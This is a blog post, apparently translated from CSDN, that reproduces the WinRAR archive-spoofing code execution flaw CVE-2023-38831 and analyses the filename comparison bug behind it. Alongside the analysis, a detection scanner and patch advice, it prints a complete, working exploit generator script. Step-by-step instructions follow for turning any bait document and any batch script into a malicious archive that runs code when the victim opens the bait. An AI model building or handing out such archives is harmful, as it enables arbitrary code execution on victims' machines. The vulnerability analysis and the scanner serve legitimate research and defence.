[Vulnerability Recurrence] RARLAB WinRAR Code Execution Vulnerability RCE (CVE-2023-38831)


Preface

WinRAR is a powerful archive manager: the graphical front end for the RAR archiving tool on Windows.
It can be used to back up data, reduce the size of email attachments, decompress RAR, ZIP and other archive types downloaded from the Internet, and create new archives in RAR and ZIP format.

Starting with version 5.60, WinRAR ships with a new icon set, but users can still switch back to the original icons with the theme pack provided on the official website.

Statement

Please do not use the techniques described in this article for illegal testing. Any direct or indirect consequences and losses caused by disseminating or using the information or tools provided here are the sole responsibility of the user; the author of this article bears no responsibility for any adverse consequences. This article is for educational purposes only.

1. Vulnerability description

WinRAR is a file compressor that supports compressing and decompressing files in RAR, ZIP and other formats. WinRAR has a code execution vulnerability when it processes an archive containing a file and a folder with the same name. An attacker constructs a specially crafted archive made up of a malicious file and a harmless bait file; after luring the victim into opening the bait file, the attacker can execute arbitrary code on the victim's machine.

There is a security vulnerability in RARLabs WinRAR versions before 6.23, which allows attackers to execute arbitrary code.


2. Affected versions

  • WinRAR < 6.23

3. Vulnerability analysis

Triggering the vulnerability involves two stages:

1. When the bait file is clicked, the file inside the folder with the same name is extracted as well.
2. When the file is executed, the .cmd file from that folder is executed instead of the original file.

Release file

After the user clicks the file, WinRAR traverses the direntry records in the ZIP file and compares direntry->name with the clicked file name (click_name). When the fourth parameter (option) of the comparison function at 0047F790 is 0x80000006, the function at 00496020 is called with option passed in as its third parameter, and inside 00496020 click_name and entry_name are compared as strings.
Since the comparison length passed in is the length of click_name, comparing "CLASSIFIED_DOCUMENTS.pdf " with "CLASSIFIED_DOCUMENTS.pdf \CLASSIFIED_DOCUMENTS.pdf .cmd" yields a match. So whenever a direntry sits inside a folder with the same name as the clicked file, the comparison function returns 1 (match) and the file belonging to that entry is extracted together with the clicked file.
In the fixed version 6.23 beta, the option value passed to the comparison function is 0x80000002. With this option the comparison function first extracts the directory part of both parameters and compares those, so the situation above no longer matches.
In the new version the option value is controlled by a flag. The flag is set once the temporary directory has been created successfully and is consulted during parsing.
File execution

Take the exploit code below as an example. After double-clicking the PDF file in the WinRAR window, WinRAR uses ShellExecuteExW to execute the file. The parameter passed is: "C:\Users\ \AppData\Local\Temp\************Rar$DIa*****.*****\CLASSIFIED_DOCUMENTS.pdf " (note the trailing space).
Because of the bug above, two files are extracted into the temporary folder: "CLASSIFIED_DOCUMENTS.pdf " and "CLASSIFIED_DOCUMENTS.pdf .cmd".

The trailing space of both file names is stripped in function 4A26B0.

Since the parameter passed to ShellExecuteExW ends with a space, it ends up executing the second file, the .cmd, and the vulnerability is triggered.
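As an added example (not from this post or the linked PoC project), a small Python scanner that flags ZIP archives whose entry layout matches the pattern described above: a top-level file next to a directory of the same name, where that directory holds a file named after the bait with an executable extension. The sample archives are constructed in memory with dummy contents; the extension list is an assumption.

```python
import io
import zipfile

# Assumed list of extensions that ShellExecuteExW would run rather than open as a document.
EXECUTABLE_EXTS = (".cmd", ".bat", ".exe", ".com", ".vbs", ".js", ".ps1", ".scr", ".lnk")


def find_cve_2023_38831_candidates(zip_bytes: bytes) -> list:
    """Return (bait, payload) pairs whose layout matches the CVE-2023-38831 trick:
    a file beside a same-named directory, where the directory contains a file whose
    name starts with the bait name (so the length-limited compare matches) and that
    carries an executable extension."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = [zi.filename for zi in zf.infolist() if not zi.is_dir()]
    findings = []
    for bait in names:
        if "/" in bait:          # only top-level bait files are of interest here
            continue
        twin = bait + "/"        # the same-named directory, in ZIP (forward-slash) form
        for other in names:
            if not other.startswith(twin):
                continue
            inner = other[len(twin):]
            if inner.startswith(bait) and inner.lower().endswith(EXECUTABLE_EXTS):
                findings.append((bait, other))
    return findings


def _build_zip(entries: dict) -> bytes:
    """Constructed sample input: an in-memory ZIP built from a name -> bytes mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample archives with dummy contents (not the PoC's files).
SUSPICIOUS_ZIP = _build_zip({
    "CLASSIFIED_DOCUMENTS.pdf ": b"%PDF-1.4 dummy",
    "CLASSIFIED_DOCUMENTS.pdf /CLASSIFIED_DOCUMENTS.pdf .cmd": b"@echo dummy",
})
BENIGN_ZIP = _build_zip({
    "report.pdf": b"%PDF-1.4 dummy",
    "report.pdf.bak/notes.txt": b"just text",
})

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_ZIP), ("benign", BENIGN_ZIP)):
        print(label, find_cve_2023_38831_candidates(blob))
```

The check works on the archive's entry names only, so it can run on mail gateways or file scanners without extracting anything.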


4. Vulnerability reproduction

The environment for this reproduction is as follows.

Reproduction environment installation package: Click to download

Verification with the GitHub script

Project address: CVE-2023-38831-winrar-exploit

The exploit code is as follows (comments mark what each part does):

import shutil
import os, sys
from os.path import join
TEMPLATE_NAME = "TEMPLATE"                 # name of the template folder
OUTPUT_NAME = "CVE-2023-38831-poc.tar"     # output archive name
BAIT_NAME = "CLASSIFIED_DOCUMENTS.pdf"     # bait file
SCRIPT_NAME = "script.bat"                 # script file
if len(sys.argv) > 3:
    BAIT_NAME = os.path.basename(sys.argv[1])
    SCRIPT_NAME = os.path.basename(sys.argv[2])
    OUTPUT_NAME = os.path.basename(sys.argv[3])
elif len(sys.argv) == 2 and sys.argv[1] == "poc":
    pass
else:
    print("""Usage:
          python .\cve-2023-38831-exp-gen.py poc
          python .\cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")
    sys.exit()
# BAIT_NAME, SCRIPT_NAME and OUTPUT_NAME are now assigned
BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")
# Determine the bait's extension: split BAIT_NAME at the last ".", take the last part,
# and prefix it with b"." to obtain BAIT_EXT
print("BAIT_NAME:", BAIT_NAME)
print("SCRIPT_NAME:", SCRIPT_NAME)
print("OUTPUT_NAME:", OUTPUT_NAME)

if os.path.exists(TEMPLATE_NAME):
    shutil.rmtree(TEMPLATE_NAME)
os.mkdir(TEMPLATE_NAME)
d = join(TEMPLATE_NAME, BAIT_NAME + "A")
if not os.path.exists(d):
    os.mkdir(d)

shutil.copyfile(join(SCRIPT_NAME), join(d, BAIT_NAME+"A.cmd"))
shutil.copyfile(join(BAIT_NAME), join(TEMPLATE_NAME, BAIT_NAME+"B"))

# if os.path.exists(OUTPUT_NAME):
#     print("!!! dir %s exists, delete it first" %(OUTPUT_NAME))
#     sys.exit()

shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)

with open(TEMPLATE_NAME + ".zip", "rb") as f:
    content = f.read()
    content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")
    content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")
# rewrite the bait file extension (the "A"/"B" markers become a trailing space)
os.remove(TEMPLATE_NAME + ".zip")
# delete the temporary zip
with open(OUTPUT_NAME, "wb")  as f:
    f.write(content)
# write the output file
print("ok..")

Two ways to generate the POC:
python cve-2023-38831-exp-gen.py poc
or
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar

Instructions

1. Place the bait file and the (evil) script file in the current directory; an image (.png, .jpg) or a document (.pdf) is recommended as the bait.
2. Run python cve-2023-38831-exp-gen.py <bait name> <script name> <output name> to generate your exploit.

Run the command to generate exp.rar, open the archive and double-click the *****.pdf file;
Calc is then executed.


5. Repair suggestions

Users who have not yet updated are advised to update to the latest version, 6.23, as soon as possible to avoid malicious attacks.


Origin blog.csdn.net/weixin_46944519/article/details/132806105